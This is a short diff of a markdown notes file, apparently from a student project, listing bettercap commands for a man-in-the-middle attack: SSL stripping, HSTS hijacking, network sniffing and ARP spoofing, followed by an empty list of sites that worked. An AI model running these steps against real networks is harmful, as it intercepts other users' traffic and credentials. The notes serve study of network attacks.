Mauricio-IRV/CS-Comps/notes/bettercap-notes.md

 #### Bettercap Steps:
 0. sudo bettercap -iface eth0
-1. help
-2. caplets.show
+1. caplets.show (optional)
-3. set http.proxy.sslstrip true
+2. set http.proxy.sslstrip true
-4. hstshijack/hstshijack
+3. hstshijack/hstshijack
-5. help
-6. net.probe on
+4. net.probe on
-7. net.sniff on
+5. net.sniff on
-8. arp.spoof on
+6. arp.spoof on
+* Note: ```help``` is always available if you don't know what to do.

 #### Working Sites (in process)
 **Sites that worked:**